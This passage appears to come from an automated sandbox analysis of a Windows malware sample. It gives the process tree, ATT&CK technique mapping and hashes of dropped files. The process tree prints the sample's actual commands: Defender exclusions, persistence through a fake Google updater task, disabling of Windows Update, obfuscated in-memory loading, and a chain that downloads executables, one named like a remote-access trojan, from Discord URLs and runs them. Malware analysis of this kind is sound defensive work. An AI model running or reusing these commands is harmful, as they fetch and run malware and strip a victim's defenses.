    - Suspicious use of WriteProcessMemory
    PID:600
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:2512
- - C:\Users\Admin\AppData\Local\Temp\directxw.exe
    "C:\Users\Admin\AppData\Local\Temp\directxw.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c mode con cols=70 lines=20
      4⤵
      PID:2496
    - - C:\Windows\SysWOW64\mode.com
        
        mode con cols=70 lines=20
        5⤵
        
        PID:1732
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\directxw.exe >> NUL
      4⤵
      PID:2660
- - C:\Users\Admin\AppData\Local\Temp\Cypher.exe
    "C:\Users\Admin\AppData\Local\Temp\Cypher.exe"
    3⤵
    - Executes dropped EXE
    PID:1816
- - C:\Users\Admin\AppData\Local\Temp\vsdir.exe
    "C:\Users\Admin\AppData\Local\Temp\vsdir.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rnspek#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1496
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:580
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2556
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2804
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1916
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2000
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:824
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:2352
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1724
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3064
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2244
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1288
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:796
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:1080
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1792
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3052
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:2716
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2604
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#egwjvgqbr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1160
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:2860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:824
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:2352
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:600
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2556
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2860
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1492
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rnspek#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2572
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1256
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe rfekwksssqrk
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:2828
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:1780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Detects videocard installed
    - Suspicious use of AdjustPrivilegeToken
    PID:832
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:1960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hnorb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2360
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1256
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe mugsrbbchfstakqu 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUdGAHAApHNCLNgYhJKykVpzeSpK36uya3cIonJZI13VzGgXeOCjyOVLVZ5lADOdlCkO0C12yYf7c05oGSYgg8neHmp3UngiG4p9AAdxPrrHmEdbLp/9F+8NADYdL30Okz2ceEBV+W1N1iJQt/HhSgOpNB0EPxjn9KV8dZeX6JkAcwxZ3Mro7CBqDNJD53Nl+xjHSEv4Mg1rN7pkRU24lGyci/Yi01sdaEb65Vu39bM5pZxn8dSFfuj131RT8WxfCnIfHVNqNeUX0lX1HSJeMcvdAk8DQzMqv964hM+yLQ4+K+KLsjQKLbolZcwjpGfsy/PhOK9vfxkOatZppvZJo4V3ZnsYGBvYV6YTIR4dZOz+ocr4SXvJPr4Szd4z9bS5MWrNn/GAgIMW0qMg4yL7tUmQ0RxkG+8sg3QYU3CGtnIbllDylRt+cIDw/I4AsAbViEjLgmji7maMOgNvGVCptoFDSs7xxVCRJdqvWRfaAfBUSlwW/n2V4mZBSEIEKel7+W4YsjrZqEPpqGWDRCiEn7bASO+d0ggsX4gKbheH5DFNhG8lL0BECuoaAKc9DOfdDEQwnF1GI4G1Ma5hFsoB95Fg==
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#pzjkq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1596
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:1216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
1⤵
PID:2940

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898655642749915136/Cypher_Rat.exe', (Join-Path -Path ($pwd).path -ChildPath 'Cypher_Rat.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hivee.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe')" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cypher_Rat.exe')" & exit
1⤵
PID:1020
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2828
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1832
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1532
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1524
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898655642749915136/Cypher_Rat.exe', (Join-Path -Path ($pwd).path -ChildPath 'Cypher_Rat.exe'))"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1068
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2172
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hivee.exe')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2332
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1208
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cypher_Rat.exe')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1288

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
1⤵
PID:1644

C:\Windows\system32\taskeng.exe
taskeng.exe {54752E78-0F4B-4C3D-8E35-9BC03514BBD4} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:2284
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'WA'+'R'+'E').GetValue('d'+'i'+'a'+'l'+'er'+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+'T'+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+'t'+'ag'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1776
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2384

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe

Filesize
960KB

MD5
367dd476c0574f68f53020529c1b2623

SHA1
747d93ffd8afbe48203ac7b19b5c087072be6670

SHA256
efb4ed64cbd3ed0031b494d87402520f4401c47684539bb4a09fb8e02024085f

SHA512
c4e13af20acab668b84d0d22fd757fd56f2202555495dd038af8bce6f4630bcce3b834437214013e7710de28c8642d79b1315c4e33481bc71b4900972428f05d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe

Filesize
960KB

MD5
367dd476c0574f68f53020529c1b2623

SHA1
747d93ffd8afbe48203ac7b19b5c087072be6670

SHA256
efb4ed64cbd3ed0031b494d87402520f4401c47684539bb4a09fb8e02024085f

SHA512
c4e13af20acab668b84d0d22fd757fd56f2202555495dd038af8bce6f4630bcce3b834437214013e7710de28c8642d79b1315c4e33481bc71b4900972428f05d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cypher.exe

Filesize
112KB

MD5
279819a8325c9ed6306dc236ac0c78e1

SHA1
84506ecb5534e132a4aea88c4a3a7504711d8733

SHA256
c2520b13d81029f5ce2318e636245c431dbfd8e633e2960ef2da30907c36f3ab

SHA512
23e68fa2fd57b980f7d5aadef9c3ac9e8c0ffa34f8c4c55f97d33d789c936dfce434701aa83c6f380976d78bd61d3be0584eeb4f633f7c85f80a401db2212f45

Download Submit
C:\Users\Admin\AppData\Local\Temp\directx.exe

Filesize
275KB

MD5
9cfc6a421eb592f551d6950493c6df4c

SHA1
d46b29bacfddd26d80d64d6e66bd9488d91a22d7

SHA256
5d95da32a776780b6e8ffb4b4cdc8bcc1a296357a7f614b9e55a300ce5808a82

SHA512
64e1c4faa7ae1126e733ee4849e2e68ea5aec03325bd2ca739524a5f53a5b532bf570a2b7b098f78e21fd2673a09d33340c97a947191ea3f01f16bf91350b078

Download Submit
C:\Users\Admin\AppData\Local\Temp\directx.exe

Filesize
275KB

MD5
9cfc6a421eb592f551d6950493c6df4c

SHA1
d46b29bacfddd26d80d64d6e66bd9488d91a22d7

SHA256
5d95da32a776780b6e8ffb4b4cdc8bcc1a296357a7f614b9e55a300ce5808a82

SHA512
64e1c4faa7ae1126e733ee4849e2e68ea5aec03325bd2ca739524a5f53a5b532bf570a2b7b098f78e21fd2673a09d33340c97a947191ea3f01f16bf91350b078

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxCrack.exe

Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxCrack.exe

Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxCrack.exe

Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxERR.exe

Filesize
277KB

MD5
42b2f41288903b76cdcd4f585e0e35f6

SHA1
d33b5b2b66329c117c307a6208c13ec3745cd662

SHA256
